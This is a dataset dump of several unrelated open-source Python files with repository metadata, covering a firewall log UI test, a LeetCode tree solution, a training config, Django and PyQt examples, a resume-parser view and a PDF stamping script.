db8694ebf7d5685301e2ad916517b43690b7ac20
|
e2e08d7c97398a42e6554f913ee27340226994d9
|
/pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_LOG/test_c142881.py
|
017398d281b068be2333be366936895d37d5e8d4
|
[] |
no_license
|
lizhuoya1111/Automated_testing_practice
|
88e7be512e831d279324ad710946232377fb4c01
|
b3a532d33ddeb8d01fff315bcd59b451befdef23
|
refs/heads/master
| 2022-12-04T08:19:29.806445
| 2020-08-14T03:51:20
| 2020-08-14T03:51:20
| 287,426,498
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,288
|
py
|
import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_log import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 142881
# 先产生安全日志 再删除
def test_c142881(browser):
try:
login_web(browser, url=dev1)
# 安全日志过滤级别改为all
edit_log_filter_lzy(browser, index="3", all='yes', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes/no', critical='yes/no', emerg='yes/no', alert="yes/no")
# IPMac绑定
add_ip_mac_binding_jyl(browser, ip="12.1.1.2", interface=interface_name_2, mac_add="auto_mac")
# 设置
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="enable",
policy_for_undefined_host="alert")
# 登录Dev2 修改2接口ip
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.2")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.3', mask='24')
# 82 ping 12.1.1.1
sleep(1)
diag_ping(browser, ipadd="12.1.1.1", interface=interface_name_2)
# 登录Dev1
sign_out_jyl(browser)
login_web(browser, url=dev1)
# 获取安全日志总数 不为0
num2 = get_log_counts_lzy(browser, log_type=安全日志)
print(num2)
# 删除安全日志
delete_log(browser, log_type=安全日志)
# 获取安全日志总数为0
num1 = get_log_counts_lzy(browser, log_type=安全日志)
print(num1)
# 获取管理日志
log1 = get_log(browser, 管理日志)
# 还原
# 还原安全日志过滤级别error critical alert emerg
edit_log_filter_lzy(browser, index="3", all='yes/no', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes', critical='yes', emerg='yes', alert="yes")
# 删除IPMac绑定
delete_ip_mac_banding_jyl(browser, ip="12.1.1.2")
# 恢复IPMac设置
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="disenable",
policy_for_undefined_host="allow")
# 82 接口2改IP
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.3")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.2', mask='24')
try:
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
|
[
"15501866985@163.com"
] |
15501866985@163.com
|
e917475fabe877dec477e34d78bf01e715efba8c
|
bcc199a7e71b97af6fbfd916d5a0e537369c04d9
|
/leetcode/solved/2568_Minimum_Fuel_Cost_to_Report_to_the_Capital/solution.py
|
ff61ddbb440902ec03f8f9a1b947035f18fde637
|
[] |
no_license
|
sungminoh/algorithms
|
9c647e82472905a2c4e505c810b622b734d9d20d
|
1389a009a02e90e8700a7a00e0b7f797c129cdf4
|
refs/heads/master
| 2023-05-01T23:12:53.372060
| 2023-04-24T06:34:12
| 2023-04-24T06:34:12
| 87,406,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,604
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <smoh2044@gmail.com>
#
# Distributed under terms of the MIT license.
"""
There is a tree (i.e., a connected, undirected graph with no cycles) structure country network consisting of n cities numbered from 0 to n - 1 and exactly n - 1 roads. The capital city is city 0. You are given a 2D integer array roads where roads[i] = [ai, bi] denotes that there exists a bidirectional road connecting cities ai and bi.
There is a meeting for the representatives of each city. The meeting is in the capital city.
There is a car in each city. You are given an integer seats that indicates the number of seats in each car.
A representative can use the car in their city to travel or change the car and ride with another representative. The cost of traveling between two cities is one liter of fuel.
Return the minimum number of liters of fuel to reach the capital city.
Example 1:
Input: roads = [[0,1],[0,2],[0,3]], seats = 5
Output: 3
Explanation:
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative2 goes directly to the capital with 1 liter of fuel.
- Representative3 goes directly to the capital with 1 liter of fuel.
It costs 3 liters of fuel at minimum.
It can be proven that 3 is the minimum number of liters of fuel needed.
Example 2:
Input: roads = [[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], seats = 2
Output: 7
Explanation:
- Representative2 goes directly to city 3 with 1 liter of fuel.
- Representative2 and representative3 go together to city 1 with 1 liter of fuel.
- Representative2 and representative3 go together to the capital with 1 liter of fuel.
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative5 goes directly to the capital with 1 liter of fuel.
- Representative6 goes directly to city 4 with 1 liter of fuel.
- Representative4 and representative6 go together to the capital with 1 liter of fuel.
It costs 7 liters of fuel at minimum.
It can be proven that 7 is the minimum number of liters of fuel needed.
Example 3:
Input: roads = [], seats = 1
Output: 0
Explanation: No representatives need to travel to the capital city.
Constraints:
1 <= n <= 105
roads.length == n - 1
roads[i].length == 2
0 <= ai, bi < n
ai != bi
roads represents a valid tree.
1 <= seats <= 105
"""
from typing import List
import pytest
import sys
class Solution:
def minimumFuelCost(self, roads: List[List[int]], seats: int) -> int:
"""Mar 20, 2023 23:06"""
graph = {}
for a, b in roads:
graph.setdefault(a, set()).add(b)
graph.setdefault(b, set()).add(a)
def dfs(a, parent=None):
if a not in graph:
return 0, 0, 0
cars_total = 0
remainders_total = 1
cost_total = 0
for b in graph[a]:
if b == parent:
continue
cars, remainders, cost = dfs(b, a)
cars_total += cars
remainders_total += remainders
cost_total += cost + cars + min(remainders, 1)
c, r = divmod(remainders_total, seats)
cars_total += c
return cars_total, r, cost_total
return dfs(0)[2]
@pytest.mark.parametrize('args', [
(([[0,1],[0,2],[0,3]], 5, 3)),
(([[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], 2, 7)),
(([], 1, 0)),
])
def test(args):
assert args[-1] == Solution().minimumFuelCost(*args[:-1])
if __name__ == '__main__':
sys.exit(pytest.main(["-s", "-v"] + sys.argv))
|
[
"smoh2044@gmail.com"
] |
smoh2044@gmail.com
|
0f6959e8b0cceca7092c8b800527680ba1e71b99
|
2bc8f66fd34ba1b93de82c67954a10f8b300b07e
|
/general_backbone/configs/image_clf_config.py
|
278078f2ccad81f5d77ba37d852e540bba918d42
|
[] |
no_license
|
DoDucNhan/general_backbone
|
7dabffed5a74e622ba23bf275358ca2d09faddc1
|
686c92ab811221d594816207d86a0b97c9b4bc73
|
refs/heads/main
| 2023-08-31T14:59:23.873555
| 2021-10-23T06:34:14
| 2021-10-23T06:34:14
| 420,419,141
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,926
|
py
|
# Copyright (c) general_backbone. All rights reserved.
# --------------------Config for model training------------------------
train_conf = dict(
# General config
model='resnet18',
epochs=300,
start_epoch=0,
pretrained=True,
num_classes=2,
eval_metric='top1',
# Checkpoint
output='checkpoint/resnet50',
checkpoint_hist=10,
recovery_interval=10,
initial_checkpoint=None,
resume=None,
no_resume_opt=False,
# Logging
log_interval=50,
log_wandb=False,
local_rank=0,
# DataLoader
batch_size=16,
num_workers=8,
prefetch_factor=2,
pin_memory=True,
shuffle=True,
# Learning rate
lr=0.001,
lr_noise_pct=0.67,
lr_noise_std=1.0,
lr_cycle_mul=1.0,
lr_cycle_decay=0.1,
lr_cycle_limit=1.0,
sched='cosin',
min_lr=1e-6,
warmup_lr=0.0001,
warmup_epochs=5,
lr_k_decay=1.0,
decay_epochs=100,
decay_rate=0.1,
patience_epochs=10,
cooldown_epochs=10,
)
test_conf = dict(
# Data Loader
batch_size=16,
shuffle=False,
num_workers=8,
prefetch_factor=2,
pin_memory=True
)
# --------------------Config for Albumentation Transformation
# You can add to dict_transform a new Albumentation Transformation class with its argument and values:
# Learn about all Albumentation Transformations, refer to link: https://albumentations.ai/docs/getting_started/transforms_and_targets/
# Note: the order in the dictionary is matched with the processive order of transformations
data_root = 'toydata/image_classification'
img_size=224
data_conf=dict(
dict_transform=dict(
RandomResizedCrop={'width':256, 'height':256, 'scale':(0.9, 1.0), 'ratio':(0.9, 1.1), 'p':0.5},
ColorJitter={'brightness':0.35, 'contrast':0.5, 'saturation':0.5, 'hue':0.2, 'always_apply':False, 'p':0.5},
ShiftScaleRotate={'shift_limit':0.05, 'scale_limit':0.05, 'rotate_limit':15, 'p':0.5},
RGBShift={'r_shift_limit': 15, 'g_shift_limit': 15, 'b_shift_limit': 15, 'p': 0.5},
RandomBrightnessContrast={'p': 0.5},
Normalize={'mean':(0.485, 0.456, 0.406), 'std':(0.229, 0.224, 0.225)},
Resize={'height':img_size, 'width': img_size},
ToTensorV2={'always_apply':True}
),
class_2_idx=None, # Dictionary link class with indice. For example: {'dog':0, 'cat':1}, Take the folder name for label If None.
img_size=img_size,
data = dict(
train=dict(
data_dir=data_root,
name_split='train',
is_training=True,
debug=False, # If you want to debug Augumentation, turn into True
dir_debug = 'tmp/alb_img_debug', # Directory where to save Augmentation debug
shuffle=True
),
eval=dict(
data_dir=data_root,
name_split='test',
is_training=False,
shuffle=False
)
)
)
|
[
"phamdinhkhanh.tkt53.neu@gmail.com"
] |
phamdinhkhanh.tkt53.neu@gmail.com
|
5a380d07f579329852a0e83a874f250f2cbda60c
|
1c2c5240222e48cf6ed617378b23ce12c7f69231
|
/backend_pms/asgi.py
|
3b584ad3f8d2261c6920ecad850891f9d554084d
|
[] |
no_license
|
MayowaFunmi/pms_backend
|
5537d642a76ce18205f4a40a84a52c0ebfb24d5b
|
0ddc8a3718bf54dd5f30394ae18c70653634d79f
|
refs/heads/master
| 2023-02-06T23:26:15.429155
| 2021-01-02T14:39:06
| 2021-01-02T14:39:06
| 322,831,233
| 0
| 0
| null | 2021-01-02T13:30:05
| 2020-12-19T11:26:19
|
Python
|
UTF-8
|
Python
| false
| false
| 399
|
py
|
"""
ASGI config for backend_pms project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend_pms.settings')
application = get_asgi_application()
|
[
"akinade.mayowa@gmail.com"
] |
akinade.mayowa@gmail.com
|
bcd47c049189dca5af79f4d85687e6732a673dce
|
bfe5ab782ca4bb08433d70bdd142913d40a40a8d
|
/Codes/141) exercise27.py
|
57d04640fbaad4771a75ad7ddec47a0b9a69418c
|
[] |
no_license
|
akshat12000/Python-Run-And-Learn-Series
|
533099d110f774f3c322c2922e25fdb1441a6a55
|
34a28d6c29795041a5933bcaff9cce75a256df15
|
refs/heads/main
| 2023-02-12T19:20:21.007883
| 2021-01-10T05:08:09
| 2021-01-10T05:08:09
| 327,510,362
| 0
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 697
|
py
|
# Create a laptop class with attributes like brand name, model name, price
# Create two instance(object) of your laptop class
class Laptop:
def __init__(self,brand_name,model_name,price):
self.brand_name=brand_name
self.model_name=model_name
self.price=price
self.full_name=brand_name+' '+model_name # we can create an extra or less instance variables
l1=Laptop("HP","Pavilion",50000)
l2=Laptop("Dell","Inspiron",45000)
print(f"Brand Name: {l1.brand_name}, Model Name: {l1.model_name}, Price: {l1.price}, Full Name: {l1.full_name}")
print(f"Brand Name: {l2.brand_name}, Model Name: {l2.model_name}, Price: {l2.price}, Full Name: {l2.full_name}")
|
[
"noreply@github.com"
] |
akshat12000.noreply@github.com
|
6a63db375fbee64f04a063e3e15d6e9caff8ca94
|
0f20f3e02aa05b8e690190a96e92a524b211338f
|
/SW_Expert_Academy_02/String2.py
|
142a9ff2f4c33454b306be6657fae7ebaa14028b
|
[] |
no_license
|
HYEONAH-SONG/Algorithms
|
ec744b7e775a52ee0756cd5951185c30b09226d5
|
c74ab3ef21a728dcd03459788aab2859560367e6
|
refs/heads/master
| 2023-07-18T14:41:48.360182
| 2021-09-03T13:41:23
| 2021-09-03T13:41:23
| 336,240,949
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
# 문장을 구성하는 단어를 역순으로 출력하는 프로그램을 작성하라
sentence = input()
s_list = sentence.split(' ')
s_list.reverse()
for i in s_list:
print(i, end=' ')
|
[
"sha082072@gmail.com"
] |
sha082072@gmail.com
|
3c6efd3975b2933f360fcc57fa1d1394bdbdbcc0
|
da8adef15efbdacda32b19196b391f63d5026e3a
|
/SistemasInteligentes/P4/main.py
|
e8b16e5345b6a927679fdea2c978a99fee08ce29
|
[] |
no_license
|
rubcuadra/MachineLearning
|
05da95c1f800e6acbce97f6ca825bd7a41d806a6
|
aa13dd007a7954d50586cca6dd413a04db18ef77
|
refs/heads/master
| 2021-03-19T17:33:14.080691
| 2018-10-19T23:43:27
| 2018-10-19T23:43:27
| 100,544,903
| 8
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,237
|
py
|
from reversi_player import Agent
from reversi import ReversiBoard
from random import shuffle
_agent2 = None
def P1Turn(board, player): #Player
move = input('Enter your move: ')
return move
def P2Turn(board, player): #IA
return _agent2.getBestMovement(board, player)
#Nivel => Profundidad de busqueda
#Fichas => 0 Blancas, 1 Negras (Para la computadora)
#Inicia => 0 Computadora, 1 Contrario
def othello(nivel, fichas=1, inicio=1):
global _agent2
_agent2 = Agent(nivel) #Crear agente para P2
#P2 is the computer
board = ReversiBoard()
print("=== GAME STARTED ===")
print(f"{board.P2S} = Blacks")
print(f"{board.P1S} = Whites\n")
print(board)
#Who starts and set tokens
if inicio == 1:
order = ["P1","P2"]
turns = [P1Turn,P2Turn]
tokens = [board.P2,board.P1] if fichas == 0 else [board.P1,board.P2]
else:
order = ["P2","P1"]
turns = [P2Turn,P1Turn]
tokens = [board.P1,board.P2] if fichas == 0 else [board.P2,board.P1]
while not ReversiBoard.isGameOver(board):
for i in range(2):
P1Score = board.score( board.P1 )
P2Score = board.score( board.P2 )
print("Scores:\t",f"{board.P1S}:{P1Score}","\t",f"{board.P2S}:{P2Score}")
if board.canPlayerMove( tokens[i] ) :
print(f"{order[i]} turn, throwing {board.getSymbol(tokens[i])}")
while True:
move = turns[i]( ReversiBoard( board.value ) ,tokens[i])
if ReversiBoard.cellExists(move):
r = board.throw(tokens[i],move)
if len(r) > 0:
print(f"Selection: {move}")
board.doUpdate(tokens[i],r)
break
print("Wrong movement, try again")
print(board)
if P1Score == P2Score: print("TIE !!")
else: print(f"Winner is {board.P1S if P1Score>P2Score else board.P2S}")
if __name__ == '__main__':
level = 2 #Dificultad de la AI
npc = 0 #Fichas del P2(AI). 0 es Blancas
starts = 1 #0 => P2 (AI) empieza
othello(level,npc,starts)
|
[
"rubcuadra@gmail.com"
] |
rubcuadra@gmail.com
|
05423c174b31b915d1aa2e5c7e66eff20ca99cb2
|
735f4a6eb4e9c72dc664926ff8b42d02da9067f2
|
/batch_four/session-3/simple_file_creation.py
|
e0e87709ebb33e6df3d688ad5803ce85956fee80
|
[] |
no_license
|
sopanshewale/python-datascience
|
943b689d4264ad06f19c8039745ba6625d556282
|
0014b48d2397e16536731e1ee91e5e36f31e1ed9
|
refs/heads/master
| 2021-01-11T20:24:58.567677
| 2018-06-09T07:07:10
| 2018-06-09T07:07:10
| 79,097,836
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
#!/usr/bin/python3
f = open ('simple_data.txt', 'w')
f.write("Hello to writing data into file")
f.write("Line ------2")
f.write("Line ------3")
f.close()
|
[
"sopan.shewale@gmail.com"
] |
sopan.shewale@gmail.com
|
08614e6d097655c7c676a0336d9f847227e88e3d
|
090a4e026addc9e78ed6118f09fd0d7d4d517857
|
/validators/funnel/_marker.py
|
475ac8c006ae087f0522dd87148fdf5d681678a6
|
[
"MIT"
] |
permissive
|
wwwidonja/new_plotly
|
0777365e53ea7d4b661880f1aa7859de19ed9b9a
|
1bda35a438539a97c84a3ab3952e95e8848467bd
|
refs/heads/master
| 2023-06-04T19:09:18.993538
| 2021-06-10T18:33:28
| 2021-06-10T18:33:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,407
|
py
|
import _plotly_utils.basevalidators
class MarkerValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="marker", parent_name="funnel", **kwargs):
super(MarkerValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Marker"),
data_docs=kwargs.pop(
"data_docs",
"""
autocolorscale
Determines whether the colorscale is a default
palette (`autocolorscale: true`) or the palette
determined by `marker.colorscale`. Has an
effect only if in `marker.color`is set to a
numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the
default palette will be chosen according to
whether numbers in the `color` array are all
positive, all negative or mixed.
cauto
Determines whether or not the color domain is
computed with respect to the input data (here
in `marker.color`) or the bounds set in
`marker.cmin` and `marker.cmax` Has an effect
only if in `marker.color`is set to a numerical
array. Defaults to `false` when `marker.cmin`
and `marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmin` must be set as well.
cmid
Sets the mid-point of the color domain by
scaling `marker.cmin` and/or `marker.cmax` to
be equidistant to this point. Has an effect
only if in `marker.color`is set to a numerical
array. Value should have the same units as in
`marker.color`. Has no effect when
`marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmax` must be set as well.
color
Sets themarkercolor. It accepts either a
specific color or an array of numbers that are
mapped to the colorscale relative to the max
and min values of the array or relative to
`marker.cmin` and `marker.cmax` if set.
coloraxis
Sets a reference to a shared color axis.
References to these shared color axes are
"coloraxis", "coloraxis2", "coloraxis3", etc.
Settings for these shared color axes are set in
the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple
color scales can be linked to the same color
axis.
colorbar
:class:`new_plotly.graph_objects.funnel.marker.Colo
rBar` instance or dict with compatible
properties
colorscale
Sets the colorscale. Has an effect only if in
`marker.color`is set to a numerical array. The
colorscale must be an array containing arrays
mapping a normalized value to an rgb, rgba,
hex, hsl, hsv, or named color string. At
minimum, a mapping for the lowest (0) and
highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in
color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may
be a palette name string of the following list:
Greys,YlGnBu,Greens,YlOrRd,Bluered,RdBu,Reds,Bl
ues,Picnic,Rainbow,Portland,Jet,Hot,Blackbody,E
arth,Electric,Viridis,Cividis.
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
line
:class:`new_plotly.graph_objects.funnel.marker.Line
` instance or dict with compatible properties
opacity
Sets the opacity of the bars.
opacitysrc
Sets the source reference on Chart Studio Cloud
for opacity .
reversescale
Reverses the color mapping if true. Has an
effect only if in `marker.color`is set to a
numerical array. If true, `marker.cmin` will
correspond to the last color in the array and
`marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is
displayed for this trace. Has an effect only if
in `marker.color`is set to a numerical array.
""",
),
**kwargs
)
|
[
"wwwidonja@gmail.com"
] |
wwwidonja@gmail.com
|
ce4db0d1eefa29d48921b8c480811378e92db97a
|
b943d3c32cac2b4d9ab85753c0a611688fba82ad
|
/resume_parser/parser_app/views.py
|
3379793d2e341273319f0dea8815914b786cd1c5
|
[
"MIT"
] |
permissive
|
ashokraman/ResumeParser
|
787e0d5fdc560c35630c1a78411e28725812a737
|
2238b7f3ea955f04cf5ccda619a15f62fcf066e3
|
refs/heads/master
| 2020-06-20T13:16:49.115304
| 2019-07-04T05:38:26
| 2019-07-04T05:38:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,190
|
py
|
from django.shortcuts import render, redirect
from resume_parser import resume_parser
from .models import UserDetails, Competencies, MeasurableResults, Resume, ResumeDetails, UploadResumeModelForm
from django.contrib.auth.models import User
from django.contrib import messages
from django.conf import settings
from django.db import IntegrityError
from django.http import HttpResponse, FileResponse, Http404, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from rest_framework.parsers import JSONParser
from .serializers import UserDetailsSerializer, CompetenciesSerializer, MeasurableResultsSerializer, ResumeSerializer, ResumeDetailsSerializer
import os
import requests
def homepage(request):
if request.method == 'POST':
user = User.objects.get(id=1)
UserDetails.objects.filter(user=user).delete()
Competencies.objects.filter(user=user).delete()
MeasurableResults.objects.filter(user=user).delete()
Resume.objects.filter(user=user).delete()
ResumeDetails.objects.filter(resume__user=user).delete()
file_form = UploadResumeModelForm(request.POST, request.FILES)
files = request.FILES.getlist('resume')
if file_form.is_valid():
for file in files:
try:
user = User.objects.get(id=1)
# saving the file
resume = Resume(user=user, resume=file)
resume.save()
# extracting resume entities
parser = resume_parser.ResumeParser(os.path.join(settings.MEDIA_ROOT, resume.resume.name))
data = parser.get_extracted_data()
# User Details
# resume.name = data.get('name')
# resume.email = data.get('email')
# resume.education = get_education(data.get('education'))
user_details = UserDetails()
user_details.user = user
user_details.name = data.get('name')
user_details.email = data.get('email')
user_details.mobile_number = data.get('mobile_number')
user_details.skills = ', '.join(data.get('skills'))
user_details.years_of_exp = data.get('total_experience')
user_details.save()
for comp in data.get('competencies'):
competencies = Competencies()
competencies.user = user
competencies.competency = comp
competencies.save()
for mr in data.get('measurable_results'):
measurable_results = MeasurableResults()
measurable_results.user = user
measurable_results.measurable_result = mr
measurable_results.save()
# Resume Details
resume_details = ResumeDetails()
resume_details.resume = resume
resume_details.page_nos = data.get('no_of_pages')
resume_details.save()
# resume.experience = ', '.join(data.get('experience'))
# measurable_results.append(data.get('measurable_results'))
# resume.save()
except IntegrityError:
messages.warning(request, 'Duplicate resume found:', file.name)
return redirect('homepage')
resumes = Resume.objects.filter(user=User.objects.get(id=1))
user_detail = UserDetails.objects.get(user=user)
messages.success(request, 'Resumes uploaded!')
overall_score = 0
competencies = data.get('competencies')
measurable_results = data.get('measurable_results')
if competencies and measurable_results:
overall_score = competencies.get('score') + measurable_results.get('score')
if competencies:
context = {
'resumes': resumes,
'competencies': competencies,
'measurable_results': measurable_results,
'no_of_pages': data.get('no_of_pages'),
'total_experience': data.get('total_experience'),
'user_details': user_detail,
'overall_score': overall_score
}
else:
context = {
'resumes': resumes,
'competencies': [],
'measurable_results': [],
'no_of_pages': data.get('no_of_pages'),
'total_experience': data.get('total_experience'),
'user_details': user_detail,
'overall_score': overall_score
}
return render(request, 'base.html', context)
else:
form = UploadResumeModelForm()
return render(request, 'base.html', {'form': form})
def get_education(education):
'''
Helper function to display the education in human readable format
'''
education_string = ''
for edu in education:
education_string += edu[0] + ' (' + str(edu[1]) + '), '
return education_string.rstrip(', ')
@csrf_exempt
def user_detail(request, pk):
"""
Retrieve, update or delete a code snippet.
"""
try:
user = User.objects.get(pk=pk)
user_details = UserDetails.objects.get(user=user)
comp = Competencies.objects.filter(user=user)
mr = MeasurableResults.objects.filter(user=user)
resume = Resume.objects.get(user=user)
resume_details = ResumeDetails.objects.filter(resume=resume)
except UserDetails.DoesNotExist:
return HttpResponse(status=404)
except Competencies.DoesNotExist:
return HttpResponse(status=404)
if request.method == 'GET':
comp_serializer = CompetenciesSerializer(comp, many=True)
mr_serializer = MeasurableResultsSerializer(mr, many=True)
resume_serializer = ResumeSerializer(resume)
resume_details_serializer = ResumeDetailsSerializer(resume_details, many=True)
user_details_serializer = UserDetailsSerializer(user_details)
data = {}
data['competencies'] = comp_serializer.data
data['measurable_results'] = mr_serializer.data
data['resume'] = resume_serializer.data
data['resume_details'] = resume_details_serializer.data
data['user_details'] = user_details_serializer.data
return JsonResponse(data)
@csrf_exempt
def job_recommendation(request):
if request.method == 'POST':
job_title = request.POST.get('job_title')
job_location = request.POST.get('job_location')
data = requests.get('https://api.ziprecruiter.com/jobs/v1?search=Python&location=Santa%20Monica&api_key=mqpqz4ev44nfu3n9brazrrix27yzipzm').json()
return JsonResponse(data)
|
[
"omkarpathak27@gmail.com"
] |
omkarpathak27@gmail.com
|
67269e55398033362ab23e10f0576fc5aeae98ab
|
2e1b5bd2d33f0beb965be77f1de2ae035c491125
|
/chapter4/qt04_drag.py
|
f30b52e75694194da80bf8c948af65dfb20391a1
|
[] |
no_license
|
mandeling/PyQt5-1
|
1cf6778e767e5746640aa0458434751a226a2383
|
9334786e70b2657e0f94b6dad4714f2aa239d0cd
|
refs/heads/master
| 2020-05-07T19:08:40.072960
| 2019-04-11T10:44:48
| 2019-04-11T10:44:48
| 180,799,901
| 1
| 0
| null | 2019-04-11T13:37:55
| 2019-04-11T13:37:55
| null |
UTF-8
|
Python
| false
| false
| 887
|
py
|
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
class Combo(QComboBox):
def __init__(self, title, parent):
super(Combo, self).__init__(parent)
self.setAcceptDrops(True)
def dragEnterEvent(self, e):
print(e)
if e.mimeData().hasText():
e.accept()
else:
e.ignore()
def dropEvent(self, e):
self.addItem(e.mimeData().text())
class Example(QWidget):
def __init__(self):
super(Example, self).__init__()
self.initUI()
def initUI(self):
lo = QFormLayout()
lo.addRow(QLabel('请把左边的文本拖曳到右边的下拉菜单中'))
edit = QLineEdit()
edit.setDragEnabled(True)
com = Combo('Button', self)
lo.addRow(edit, com)
self.setLayout(lo)
self.setWindowTitle('简单的拖曳例子')
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
ex.show()
sys.exit(app.exec())
|
[
"sqw123az@sina.com"
] |
sqw123az@sina.com
|
c33c5d21ce909bc806b78c0dde5a40c39d15fbd5
|
00d7e9321d418a2d9a607fb9376b862119f2bd4e
|
/utils/pdf_figure_stamper.py
|
4628dbee41fd552c97249ac0bbeb5cd6de0b08e4
|
[
"MIT"
] |
permissive
|
baluneboy/pims
|
92b9b1f64ed658867186e44b92526867696e1923
|
5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13
|
refs/heads/master
| 2021-11-16T01:55:39.223910
| 2021-08-13T15:19:48
| 2021-08-13T15:19:48
| 33,029,780
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,335
|
py
|
#!/usr/bin/env python
import os
from pims.files.pdfs.pdfjam import CpdfAddTextCommand
from pims.files.utils import listdir_filename_pattern
# return list of PDF files matching filename pattern criteria (not having STAMPED in filename)
def get_pdf_files(dirpath, fname_pat):
"""return list of PDF files for this drop number (i.e. drop dir)"""
tmp_list = listdir_filename_pattern(dirpath, fname_pat)
# filter tmp_list to ignore previous run's _cpdf_ filenames
return [ x for x in tmp_list if "STAMPED" not in x ]
if __name__ == "__main__":
# get list of analysis template plot PDFs
sensor = '121f02'
sensor_suffix = '010'
fname_pat = '.*' + sensor + sensor_suffix + '_gvtm_pops_.*_EML_analysis.pdf'
dirpath = '/home/pims/dev/matlab/programs/special/EML/hb_vib_crew_Vehicle_and_Crew_Activity/plots'
pdf_files = sorted(get_pdf_files(dirpath, fname_pat))
c = 0
for f in pdf_files:
c += 1
print 'page %02d %s' % (c, f)
#cpdf -prerotate -add-text "${F}" ${F} -color "0.5 0.3 0.4" -font-size 6 -font "Courier" -pos-left "450 5" -o ${F/.pdf/_cpdf_add-text.pdf}
color = "0.5 0.3 0.4"
font = "Courier"
font_size = 6
pos_left = "450 5"
cat = CpdfAddTextCommand(f, color, font, font_size, pos_left)
cat.run()
|
[
"silversnoopy2002@gmail.com"
] |
silversnoopy2002@gmail.com
|
116c66d9f3c1b4f5e2c4991742de3a8413bbff56
|
854b220c25dc886f77c237437c370782a68c8bb2
|
/proyectos_de_ley/api/api_responses.py
|
f94452466a9934b2e9df3b1b8c8aaa98a4e6592c
|
[
"MIT"
] |
permissive
|
MrBaatezu/proyectos_de_ley
|
b6bb672b5bcc3c8ca2b6327ee96083466356560d
|
56cf6f2f1df6483d2057235132a376b068877407
|
refs/heads/master
| 2021-01-18T01:10:12.683082
| 2015-10-29T00:44:52
| 2015-10-29T00:44:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 975
|
py
|
from django.http import HttpResponse
from rest_framework.renderers import JSONRenderer
from rest_framework_csv import renderers
class JSONResponse(HttpResponse):
"""
An HttpResponse that renders its content into JSON.
"""
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
class CSVResponse(HttpResponse):
"""
An HttpResponse that renders its content into CSV.
"""
def __init__(self, data, **kwargs):
content = CSVRenderer().render(data)
kwargs['content_type'] = 'text/csv'
super(CSVResponse, self).__init__(content, **kwargs)
class CSVRenderer(renderers.CSVRenderer):
media_type = 'text/csv'
